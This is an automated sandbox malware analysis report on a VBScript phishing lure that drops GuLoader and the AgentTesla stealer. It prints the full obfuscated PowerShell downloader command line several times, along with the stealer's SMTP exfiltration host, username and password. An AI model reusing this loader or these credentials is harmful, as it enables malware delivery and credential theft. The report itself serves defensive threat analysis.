Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arrival Notice PUS_pdf.vbs

Overview

General Information

Sample name:Arrival Notice PUS_pdf.vbs
Analysis ID:1427934
MD5:addc13066aacdb6cdb21ae368bce83d2
SHA1:d4d509e48e946e01605df86bfebf8f4cbc4648f7
SHA256:9c8fb0ee8d5a21346a7e25567abd4155c543d90a213a40d79269d1c4d3b269be
Tags:Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7468 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 7572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7840 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8108 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7192 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7228 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "africa@myhydropowered.com", "Password": "q5NHtWyc5WKhunX"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_8108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xdfe4:$b2: ::FromBase64String(
            • 0xd0bf:$s1: -join
            • 0x686b:$s4: +=
            • 0x692d:$s4: +=
            • 0xab54:$s4: +=
            • 0xcc71:$s4: +=
            • 0xcf5b:$s4: +=
            • 0xd0a1:$s4: +=
            • 0x173d0:$s4: +=
            • 0x17450:$s4: +=
            • 0x17516:$s4: +=
            • 0x17596:$s4: +=
            • 0x1776c:$s4: +=
            • 0x177f0:$s4: +=
            • 0xd88f:$e4: Get-WmiObject
            • 0xda7e:$e4: Get-Process
            • 0xdad6:$e4: Start-Process
            • 0x15ef2:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", ProcessId: 7468, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", ProcessId: 7468, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineSti

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: wscript.exe.7468.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "africa@myhydropowered.com", "Password": "q5NHtWyc5WKhunX"}
            Multi AV Scanner detection for domain / URL
            Source: mail.myhydropowered.comVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Arrival Notice PUS_pdf.vbsReversingLabs: Detection: 13%
            Source: Arrival Notice PUS_pdf.vbsVirustotal: Detection: 15%Perma Link
            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
